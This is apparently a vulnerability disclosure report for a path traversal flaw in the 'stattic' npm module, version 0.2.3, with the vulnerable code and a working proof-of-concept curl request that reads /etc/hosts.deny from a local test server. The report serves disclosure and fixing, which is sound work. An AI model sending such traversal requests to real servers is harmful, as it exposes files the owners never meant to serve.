I would like to report Path Traversal in stattic
module.
It allows to read content of some arbitrary files from the server where stattic
is installed and run.
module name: statticversion:0.2.3npm page: https://www.npmjs.com/package/stattic
Ridiculous simple script for serving static files using http module.
Stats
7 downloads in the last day
32 downloads in the last week
77 downloads in the last month
~900 estimated downloads per year
Path Traversal vulnerability in stattic module
allows to go up in directory tree and read content of some files outside of the root path set up in the module config.
However, this issue allows to read only files with extension, because if no extension is provided, stattic
by default uses setting from options.index
variable.
Install stattic
module:
$ npm install stattic
Create sample application:
// app.js
//Import libs
var stattic = require('stattic');
//Set the folder with the static files
stattic.set('folder', './');
//Set the port
stattic.set('port', 8080);
//Run the server
stattic.listen();
Run application:
$ node app.js
Here’s the part of stattic
code responsible for handling paths:
// node_modules/stattic/index.js, line 70:
//Parse the request url and get only the pathname
var pathname = url.parse(req.url).pathname;
//Resolve to the local folder
var local_path = path.join(options.folder, pathname);
//Check the extension
if(path.extname(local_path) === '')
{
//Add the index file to the local path
local_path = path.join(local_path, './' + path.basename(options.index));
}
If file provided has no extension, /
and options.index
are added (by default, it will become /index.html
). This causes that eg. /etc/passwd
path become /etc/passwd/index.html
, but /etc/hosts.deny
is valid filename and can be read:
$ curl -v --path-as-is http://localhost:8080/../../../../../etc/hosts.deny
* Trying ::1...
* Connected to localhost (::1) port 8080 (#0)
> GET /../../../../../etc/hosts.deny HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: null
< Date: Fri, 23 Feb 2018 12:36:35 GMT
< Connection: keep-alive
< Transfer-Encoding: chunked
<
# /etc/hosts.deny: list of hosts that are _not_ allowed to access the system.
# See the manual pages hosts_access(5) and hosts_options(5).
#
# Example: ALL: some.host.name, .some.domain
# ALL EXCEPT in.fingerd: other.host.name, .other.domain
#
# If you're going to protect the portmapper use the name "rpcbind" for the
# daemon name. See rpcbind(8) and rpc.mountd(8) for further information.
#
# The PARANOID wildcard matches any host whose name does not match its
# address.
#
# You may wish to enable this to ensure any programs that don't
# validate looked up hostnames still leave understandable logs. In past
# versions of Debian this has been the default.
# ALL: PARANOID
* Connection #0 to host localhost left intact
Probably some protection against typical Path Traversal exploitation methods should be introduced here.
Regards,
Rafal ‘bl4de’ Janicki
Path Traversal vulnerability in stattic module
allows to go up in directory tree and read content of some files outside of the root path set up in the module config.